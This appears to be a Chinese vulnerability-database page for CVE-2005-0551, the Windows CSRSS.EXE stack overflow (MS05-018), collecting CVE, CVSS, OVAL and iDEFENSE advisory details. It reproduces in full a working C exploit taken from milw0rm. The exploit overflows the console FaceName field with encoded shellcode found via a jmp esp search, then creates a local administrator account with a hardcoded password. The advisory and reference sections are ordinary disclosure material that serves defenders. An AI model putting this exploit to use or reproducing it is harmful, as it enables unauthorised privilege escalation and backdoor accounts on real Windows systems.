CVE-2005-0551
CVSS10.0
发布时间 :2005-05-02 00:00:00
修订时间 :2008-09-10 15:36:10
NMCOEPS    

[原文]Stack-based buffer overflow in WINSRV.DLL in the Client Server Runtime System (CSRSS) process of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via a specially-designed application that provides console window information with a long FaceName value.


[CNNVD]Microsoft Windows CSRSS.EXE栈溢出漏洞 (MS05-018)(CNNVD-200505-017)

        Windows内核是操作系统核心部分,提供系统级别服务,如设备和内存管理,分配处理器时间和管理错误处理。
        Win32 API在实现命令行和其他基于字符的用户界面时使用控制台窗口。实现上述功能的特定代码位于CSRSS.EXE系统进程中。CSRSS.EXE进程的WINSRV.DLL文件创建并管理控制台窗口。如果用户从控制台窗口的系统菜单中选择了"属性"选项的话,包含有控制台窗口信息的数据结构就被拷贝到了文件映射的对象。该数据结构被称为CONSOLE_STATE_INFO,结构如下:
        typedef struct _CONSOLE_STATE_INFO
         {
         /* 0x00 */ DWORD cbSize;
         /* 0x04 */ COORD ScreenBufferSize;
         /* 0x08 */ COORD WindowSize;
         /* 0x0c */ POINT WindowPosition;
         /* 0x14 */ COORD FontSize;
         /* 0x18 */ DWORD FontFamily;
         /* 0x1c */ DWORD FontWeight;
         /* 0x20 */ WCHAR FaceName[32]; /* Buffer Overflow */
         /* 0x60 */ DWORD CursorSize;
         /* 0x64 */ BOOL FullScreen;
         /* 0x68 */ BOOL QuickEdit;
         /* 0x6c */ BOOL DefaultWindowPos;
         /* 0x70 */ BOOL InsertMode;
         /* 0x74 */ WORD ScreenColors;
         /* 0x76 */ WORD PopupColors;
         /* 0x78 */ BOOL HistoryNoDup;
         /* 0x7c */ DWORD HistoryBufferSize;
         /* 0x80 */ DWORD NumberOfHistoryBuffers;
         /* 0x84 */ COLORREF ColorTable[16];
         /* 0xc4 */ DWORD CodePage;
         /* 0xc8 */ DWORD hwnd;
         /* 0xcc */ WCHAR ConsoleTitle[2];
         } CONSOLE_STATE_INFO, *PCONSOLE_STATE_INFO;
        该结构中的值被传送到了WINSRV.DLL中的代码,但该代码没有正确的验证数据。攻击者可以发送全部为0的CONSOLE_STATE_INFO就可以导致CSRSS进程终止和系统崩溃(蓝屏)。
        CONSOLE_STATE_INFO数据结构中还包含有指定字体名称的字符串FaceName[32]。该字符串通过wcscpy()函数拷贝到了固定大小的栈缓冲区,但没有任何检查,如下所示:
         0x5FFB39DF push [ebp+lpFaceName]
         0x5FFB39E2 lea eax, [ebp-54h]
         0x5FFB39E5 push eax
         0x5FFB39E6 call j_wcscpy
        攻击者可以通过提供大于32个字节的字符串触发栈溢出,这样就可以完全控制计算机,执行任意代码。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_2000Microsoft Windows 2000
cpe:/o:microsoft:windows_xp::sp2:tablet_pcMicrosoft windows xp_sp2 tablet_pc
cpe:/o:microsoft:windows_2003_server:r2
cpe:/o:microsoft:windows_xp::sp1:tablet_pcMicrosoft windows xp_sp1 tablet_pc

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:777Windows 2000 CSRSS Privilege Escalation Vulnerability
oval:org.mitre.oval:def:3544Windows XP CSRSS Privilege Escalation Vulnerability
oval:org.mitre.oval:def:266Windows XP (SP2) CSRSS Privilege Escalation Vulnerability
oval:org.mitre.oval:def:1822Server 2003 CSRSS Privilege Escalation Vulnerability
oval:gov.nist.fdcc.patch:def:7MS05-018: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege and Denial of Service (890859)
oval:gov.nist.USGCB.patch:def:7MS05-018: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege and Denial of Service (890859)
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0551
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0551
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-017
(官方数据源) CNNVD

- 其它链接及资源

http://www.microsoft.com/technet/security/bulletin/ms05-018.mspx
(VENDOR_ADVISORY)  MS  MS05-018
http://www.idefense.com/application/poi/display?id=230&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050412 Microsoft Windows CSRSS.EXE Stack Overflow Vulnerability

- 漏洞信息

Microsoft Windows CSRSS.EXE栈溢出漏洞 (MS05-018)
危急 缓冲区溢出
2005-05-02 00:00:00 2005-10-20 00:00:00
本地  
        Windows内核是操作系统核心部分,提供系统级别服务,如设备和内存管理,分配处理器时间和管理错误处理。
        Win32 API在实现命令行和其他基于字符的用户界面时使用控制台窗口。实现上述功能的特定代码位于CSRSS.EXE系统进程中。CSRSS.EXE进程的WINSRV.DLL文件创建并管理控制台窗口。如果用户从控制台窗口的系统菜单中选择了"属性"选项的话,包含有控制台窗口信息的数据结构就被拷贝到了文件映射的对象。该数据结构被称为CONSOLE_STATE_INFO,结构如下:
        typedef struct _CONSOLE_STATE_INFO
         {
         /* 0x00 */ DWORD cbSize;
         /* 0x04 */ COORD ScreenBufferSize;
         /* 0x08 */ COORD WindowSize;
         /* 0x0c */ POINT WindowPosition;
         /* 0x14 */ COORD FontSize;
         /* 0x18 */ DWORD FontFamily;
         /* 0x1c */ DWORD FontWeight;
         /* 0x20 */ WCHAR FaceName[32]; /* Buffer Overflow */
         /* 0x60 */ DWORD CursorSize;
         /* 0x64 */ BOOL FullScreen;
         /* 0x68 */ BOOL QuickEdit;
         /* 0x6c */ BOOL DefaultWindowPos;
         /* 0x70 */ BOOL InsertMode;
         /* 0x74 */ WORD ScreenColors;
         /* 0x76 */ WORD PopupColors;
         /* 0x78 */ BOOL HistoryNoDup;
         /* 0x7c */ DWORD HistoryBufferSize;
         /* 0x80 */ DWORD NumberOfHistoryBuffers;
         /* 0x84 */ COLORREF ColorTable[16];
         /* 0xc4 */ DWORD CodePage;
         /* 0xc8 */ DWORD hwnd;
         /* 0xcc */ WCHAR ConsoleTitle[2];
         } CONSOLE_STATE_INFO, *PCONSOLE_STATE_INFO;
        该结构中的值被传送到了WINSRV.DLL中的代码,但该代码没有正确的验证数据。攻击者可以发送全部为0的CONSOLE_STATE_INFO就可以导致CSRSS进程终止和系统崩溃(蓝屏)。
        CONSOLE_STATE_INFO数据结构中还包含有指定字体名称的字符串FaceName[32]。该字符串通过wcscpy()函数拷贝到了固定大小的栈缓冲区,但没有任何检查,如下所示:
         0x5FFB39DF push [ebp+lpFaceName]
         0x5FFB39E2 lea eax, [ebp-54h]
         0x5FFB39E5 push eax
         0x5FFB39E6 call j_wcscpy
        攻击者可以通过提供大于32个字节的字符串触发栈溢出,这样就可以完全控制计算机,执行任意代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (1198)

MS Windows CSRSS Local Privilege Escalation Exploit (MS05-018) (EDBID:1198)
windows local
2005-09-06 Verified
0 eyas
N/A [点击下载]
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>

#pragma comment (lib,"Advapi32.lib")

typedef struct _CONSOLE_STATE_INFO    {      
	  /* 0x00 */  DWORD cbSize;
      /* 0x04 */  COORD ScreenBufferSize;
      /* 0x08 */  COORD WindowSize;
      /* 0x0c */  POINT WindowPosition;
      /* 0x14 */  COORD FontSize;
      /* 0x18 */  DWORD FontFamily;
      /* 0x1c */  DWORD FontWeight;
      /* 0x20 */  WCHAR FaceName[0x200];
} CONSOLE_STATE_INFO, *PCONSOLE_STATE_INFO;

typedef struct xxx
{
	DWORD	dw[6];
	char	cmd[0x50];
}address_and_cmd;

char decoder[]=
"\x8b\xdc"
"\xBE\x44\x59\x41\x53\x46\xBF\x44\x59\x34\x53\x47\x43\x39\x33\x75"
"\xFB\x83\xC3\x04\x80\x33\x97\x43\x39\x3B\x75\xF8\x45\x59\x41\x53";
//user=e
//pass=asd#321
char add_user[]=
"\x90\x90\x90\x90\x90\x90\x90\x8D\x7b\x98\xFF\x77\x14\x6A\x00\x68"
"\x2A\x04\x00\x00\xFF\x17\x8B\xD8\x6A\x04\x68\x00\x10\x00\x00\x68"
"\x00\x01\x00\x00\x6A\x00\x53\xFF\x57\x04\x8B\xF0\x6A\x00\x68\x00"
"\x01\x00\x00\x8D\x47\x18\x50\x56\x53\xFF\x57\x08\x33\xC0\x50\x50"
"\x56\xFF\x77\x10\x50\x50\x53\xFF\x57\x0C";
char decode_end_sign[]="EY4S";
char sc[0x200];

char	szConsoleTitle[256];

DWORD search_jmpesp()
{
	char szDLL[][30] = {"ntdll.dll",
						"kernel32.dll",
						"user32.dll",
						"gdi32.dll",						
						"winsrv.dll",
						"csrsrv.dll",
						"basesrv.dll"};
	int		i,y;
	BOOL	done;
	HMODULE	h;
	BYTE	*ptr;
	DWORD	addr=0;

	for(i=0;i<sizeof(szDLL)/sizeof(szDLL[0]);i++)
	{
		done = FALSE;
		h = LoadLibrary(szDLL[i]);
		if(h == NULL) 
			continue;
		printf("[+] start search \"FF E4\" in %s\n", szDLL[i]);
		ptr = (BYTE *)h;
		for(y = 0;!done;y++) 
		{ 
			__try 
			{ 
				if(ptr[y] == (BYTE)'\xFF' && ptr[y+1] == (BYTE)'\xE4') 
				{ 
					addr = (int)ptr + y; 
					done = TRUE;
					printf("[+] found \"FF E4\"(jmp esp) in %X[%s]\n", addr, szDLL[i]);
				} 
			} 
			__except(EXCEPTION_EXECUTE_HANDLER)
			{
				done = TRUE; 
			} 
		} 
		FreeLibrary(h);
		if(addr) break;
	}
	return addr;
}
BOOL make_shellcode(DWORD dwTargetPid)
{
	HMODULE	hKernel32;
	address_and_cmd	aac;
	int		i=0, j=0, size=0;

	hKernel32 = LoadLibrary("kernel32.dll");
	if(!hKernel32) return FALSE;
	aac.dw[0] = (DWORD)GetProcAddress(hKernel32, "OpenProcess");
	aac.dw[1] = (DWORD)GetProcAddress(hKernel32, "VirtualAllocEx");
	aac.dw[2] = (DWORD)GetProcAddress(hKernel32, "WriteProcessMemory");
	aac.dw[3] = (DWORD)GetProcAddress(hKernel32, "CreateRemoteThread");
	aac.dw[4] = (DWORD)GetProcAddress(hKernel32, "WinExec");
	aac.dw[5] = dwTargetPid;

	memset(aac.cmd, 0, sizeof(aac.cmd));
	strcpy(aac.cmd, "cmd /c net user e asd#321 /add && net localgroup administrators e /add");

	//encode
	strcpy(sc, decoder);
	for(i=0;i<sizeof(add_user);i++)
		add_user[i]^=(BYTE)'\x97';
	strcat(sc, add_user);
	for(i=0;i<sizeof(aac);i++)
		((char *)&aac)[i]^=(BYTE)'\x97';
	size=strlen(sc);
	memcpy(&sc[size], (char *)&aac, sizeof(aac));
	size+=sizeof(aac);
	sc[size]='\x0';
	strcat(sc, decode_end_sign);

	return TRUE;
}

void exploit(HWND hwnd,	DWORD dwPid)
{
	HANDLE				hFile;
	LPVOID				lp;
	int					i, index;
	DWORD				dwJMP;
	CONSOLE_STATE_INFO	csi;


	memset((void *)&csi, 0, sizeof(csi));
	csi.cbSize = sizeof(csi);
	csi.ScreenBufferSize.X = 0x0050;
	csi.ScreenBufferSize.Y = 0x012c;
	csi.WindowSize.X = 0x0050;
	csi.WindowSize.Y=0x0019;
	csi.WindowPosition.x = 0x58;
	csi.WindowPosition.y = 0x58;
	csi.FontSize.X = 0;
	csi.FontSize.Y=0xc;
	csi.FontFamily = 0x36;
	csi.FontWeight = 0x190;
	
	for(i=0;i<0x58;i++)
		((char *)csi.FaceName)[i] = '\x90';
	dwJMP = search_jmpesp();
	if(!dwJMP)
	{
		printf("[-] search FF E4 failed.\n");
		return;
	}
	memcpy(&((char *)csi.FaceName)[0x58], (char *)&dwJMP, 4);
	for(i=0;i<0x20;i++)
		strcat((char *)csi.FaceName, "\x90");
	index = strlen((char *)csi.FaceName);

	if(!make_shellcode(dwPid)) return;
	memcpy(&((char *)csi.FaceName)[index], (char *)sc, strlen(sc));

	hFile = CreateFileMappingW((void *)0xFFFFFFFF,0,4,0,csi.cbSize,0);
	if(!hFile)
	{
		printf("[-] CreateFileMapping failed:%d\n", GetLastError());
		return;
	}
	printf("[+] CreateFileMapping OK!\n");
	lp = MapViewOfFile(hFile, 0x0F001F,0,0,0);
	if(!lp)
	{
		printf("[-] MapViewOfFile failed:%d\n", GetLastError());
		return;
	}
	printf("[+] MapViewOfFile OK!\n");
	//copy
	memcpy((unsigned short *)lp, (unsigned short *)&csi, csi.cbSize);

	printf("[+] Send Exploit!\n");
	SendMessageW(hwnd,0x4C9,(WPARAM)hFile,0);
}

void main(int argc, char **argv)
{
	DWORD	dwRet;
	HWND	hwnd = NULL;
	DWORD	dwPid = 0;
	HANDLE hSnapshot = NULL;
	PROCESSENTRY32		pe;

	printf( "MS05-018 windows CSRSS.EXE Stack Overflow exp v1.0\n"
			"Affect: Windows 2000 sp3/sp4 (all language)\n"
			"Coded by eyas <eyas at xfocus.org>\n"
			"http://www.xfocus.net\n\n");
	
	if(argc==2)
	{
		dwPid = atoi(argv[1]);
	}
	else
	{
		printf("Usage: %s pid\n\n", argv[0]);
		hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
		pe.dwSize = sizeof(PROCESSENTRY32);
		Process32First(hSnapshot,&pe);
		do
		{		
			if( strcmpi(pe.szExeFile, "WINLOGON.EXE") == 0)
			{
				printf("[+] PID=%d Process=%s\n", pe.th32ProcessID, pe.szExeFile);
			}
		}
		while(Process32Next(hSnapshot,&pe)==TRUE);
		CloseHandle (hSnapshot);
	}

	if(!dwPid)	return;

	if(!FreeConsole())
		printf("[-] FreeConsole failed:%d\n", GetLastError());
	else
	{
		printf("[+] FreeConsole ok.\n");
		if(!AllocConsole())
			printf("[-] AllocConsole failed:%d\n", GetLastError());
		else
			printf("[+] AllocConsole ok.\n");
	}

	dwRet = GetConsoleTitle(szConsoleTitle, sizeof(szConsoleTitle));
	if(dwRet)
	{
		printf("[+] Get Console Title OK:\"%s\"\n", szConsoleTitle);
	}
	else
	{
		printf("[-] Get Console Title failed.\n");
		return;
	}

	hwnd = FindWindow("ConsoleWindowClass",szConsoleTitle); 
	if(hwnd)
		printf("[+] bingo! found hwnd=%X\n", hwnd);
	else
	{
		printf("[-] can't found hwnd!\n");
		return;
	}

	exploit(hwnd, dwPid);
	printf("[+] Done.\n");
}

// milw0rm.com [2005-09-06]
		

- 漏洞信息 (F37187)

04.12.05b.txt (PacketStormID:F37187)
2005-04-18 00:00:00
 
advisory,overflow,local
windows
CVE-2005-0551
[点击下载]

iDEFENSE Security Advisory 04.12.05 (b) - CSRSS.EXE (the core executable for the Windows Client/Server Runtime Server Subsystem, the process which manages most graphical commands in Windows) is vulnerable to a local stack-based buffer overflow.

Microsoft Windows CSRSS.EXE Stack Overflow Vulnerability

iDEFENSE Security Advisory 04.12.05
www.idefense.com/application/poi/display?id=230&type=vulnerabilities
April 12, 2005

I. BACKGROUND

The Win32 application-programming interface (API) offers a console
windows feature that provides a means to implement command-line and 
other character-based user interfaces. The specific code for this
feature within the Windows 2000, XP and 2003 operating systems resides
in a core system process called CSRSS.EXE. This process is the main
executable for the Microsoft Client/Server Runtime Server Subsystem. The
process manages most graphical commands in Windows.

II. DESCRIPTION

Local exploitation of a stack-based buffer overflow vulnerability within
various versions of Microsoft Corp.'s Windows operating system allows
attackers to execute arbitrary code with SYSTEM privileges.

Console windows are created and managed by code in the WINSRV.DLL file
that resides in the CSRSS.EXE process. This file contains the
server-side version of the 32-bit user and GDI routines (graphics
engine). When a user selects the "Properties" item from the system menu
of a console window, a data structure containing information about the
console window is copied into the file-mapping object. The text of an
assert in the checked build appears to indicate that this structure is
called CONSOLE_STATE_INFO, which has the following structure:

    typedef struct _CONSOLE_STATE_INFO
    {
      /* 0x00 */  DWORD cbSize;
      /* 0x04 */  COORD ScreenBufferSize;
      /* 0x08 */  COORD WindowSize;
      /* 0x0c */  POINT WindowPosition;
      /* 0x14 */  COORD FontSize;
      /* 0x18 */  DWORD FontFamily;
      /* 0x1c */  DWORD FontWeight;
      /* 0x20 */  WCHAR FaceName[32];     /* Buffer Overflow */
      /* 0x60 */  DWORD CursorSize;
      /* 0x64 */  BOOL  FullScreen;
      /* 0x68 */  BOOL  QuickEdit;
      /* 0x6c */  BOOL  DefaultWindowPos;
      /* 0x70 */  BOOL  InsertMode;
      /* 0x74 */  WORD  ScreenColors;
      /* 0x76 */  WORD  PopupColors;
      /* 0x78 */  BOOL  HistoryNoDup;
      /* 0x7c */  DWORD HistoryBufferSize;
      /* 0x80 */  DWORD NumberOfHistoryBuffers;
      /* 0x84 */  COLORREF ColorTable[16];
      /* 0xc4 */  DWORD CodePage;
      /* 0xc8 */  DWORD hwnd;
      /* 0xcc */  WCHAR ConsoleTitle[2];
    } CONSOLE_STATE_INFO, *PCONSOLE_STATE_INFO;

The values contained within this struct are passed as a file-mapping
object to code within WINSRV.DLL that does not properly validate the
data. Passing a CONSOLE_STATE_INFO of all zero's can induce an integer
divide-by-zero exception in the CSRSS process that will cause the
process to terminate and the system to crash (blue screen) shortly
thereafter. The CONSOLE_STATE_INFO data structure contains a null
terminated string specifying the name of a font, FaceName[32]. This
string is copied into a fixed sized stack buffer without any sanity
checking via the wcscpy() function, as can be seen in the following
assembly excerpt from WINSRV.DLL on Windows 2000 Service Pack 4 Checked
Build:

    0x5FFB39DF push [ebp+lpFaceName]
    0x5FFB39E2 lea eax, [ebp-54h]
    0x5FFB39E5 push eax
    0x5FFB39E6 call j_wcscpy

By supplying a string longer than 32 bytes, an attacker can trigger the
stack-based buffer overflow to gain control of the computer and
eventually execute arbitrary code.

III. ANALYSIS

Exploitation allows local unprivileged users to potentially execute
arbitrary code on affected systems with SYSTEM privileges. An attacker
with non-privileged access to a vulnerable system can leverage this
vulnerability to fully compromise the underlying system. Exploitation of
the described vulnerability requires that the attacker be able to create
a console window. This attack may be used on public terminals to break
imposed restrictions that otherwise prevent users from fully controlling
the computer.

IV. DETECTION

iDEFENSE has confirmed the existence and exploitability of this
vulnerability in Microsoft Windows 2000 SP4 and Microsoft Windows XP
SP1a containing the following versions of CSRSS.EXE and WINSRV.DLL:

    * Windows 2000 SP4 CSRSS.EXE  - 5.0.2195.6601
    * Windows 2000 SP4 WINSRV.DLL - 5.0.2195.6699
    * Windows XP SP1a  CSRSS.EXE  - 5.0.2195.6601
    * Windows XP SP1a  WINSRV.DLL - 5.0.2195.6699

iDEFENSE has confirmed the existence of this vulnerability as a local
denial of service (blue screen) on Windows XP SP2 and Windows 2003. It
is believed that code execution may also be possible on these platforms,
though more difficult, as both platforms employ buffer overflow
exploitation prevention methods.

V. WORKAROUND

Restrict console access on public terminals where security is a concern.
This can be accomplished by creating the following registry key:

    HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System

Add a DWORD named DisableCMD with the value "1" to disable command
prompt and batch files or the value "2" to disable command prompt but
allow batch files.

VI. VENDOR RESPONSE

This vulnerability is addressed in Microsoft Security Bulletin MS05-018
available at:

http://www.microsoft.com/technet/security/Bulletin/MS05-018.mspx

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
names CAN-2005-0551 to these issues. This is a candidate for inclusion
in the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

01/04/2005      Initial vendor notification
01/04/2005      Initial vendor response
04/12/2005      Coordinated public disclosure

IX. CREDIT

David Fritz is credited with this discovery.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.

There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

    

- 漏洞信息

15462
Microsoft Windows CSRSS Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A local overflow exists in Windows. WINSVR.DLL fails to validate values within the CONSOLE_STATE_INFO struct resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-04-12 Unknow
2005-09-08 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Windows Kernel CSRSS Local Privilege Escalation Vulnerability
Access Validation Error 13115
No Yes
2005-04-12 12:00:00 2008-12-10 11:32:00
David Fritz is credited with the discovery of this issue.

- 受影响的程序版本

Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP Embedded SP1
Microsoft Windows XP Embedded
Microsoft Windows XP 64-bit Edition Version 2003 SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows Server 2003 Itanium 0
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows ME
Microsoft Windows 98SE
Microsoft Windows 98 SP1
Microsoft Windows 98 j
Microsoft Windows 98 b
Microsoft Windows 98 a
Microsoft Windows 98
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Windows Server 2003 Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1

- 不受影响的程序版本

Microsoft Windows Server 2003 Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1

- 漏洞讨论

A local privilege-escalation vulnerability affects Microsoft Windows because the kernel fails to properly handle user-supplied messages.

A local attacker may leverage this issue to completely compromise the computer.

- 漏洞利用

Exploit code is available:

- 解决方案

Microsoft has released updates to address supported platforms.


Microsoft Windows XP Media Center Edition SP2

Microsoft Windows XP 64-bit Edition SP1

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows 2000 Professional SP3

Microsoft Windows XP Tablet PC Edition SP1

Microsoft Windows XP Home SP2

Microsoft Windows 2000 Datacenter Server SP4

Microsoft Windows XP Tablet PC Edition SP2

Microsoft Windows XP Media Center Edition SP1

Microsoft Windows 2000 Advanced Server SP3

Microsoft Windows XP Home SP1

Microsoft Windows 2000 Datacenter Server SP3

Microsoft Windows XP 64-bit Edition Version 2003 SP1

Microsoft Windows Server 2003 Enterprise Edition Itanium 0

Microsoft Windows 2000 Server SP3

Microsoft Windows XP 64-bit Edition Version 2003

Microsoft Windows XP Professional SP2

Microsoft Windows 2000 Server SP4

Microsoft Windows 2000 Professional SP4

Microsoft Windows XP Professional SP1

Microsoft Windows Server 2003 Datacenter Edition Itanium 0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站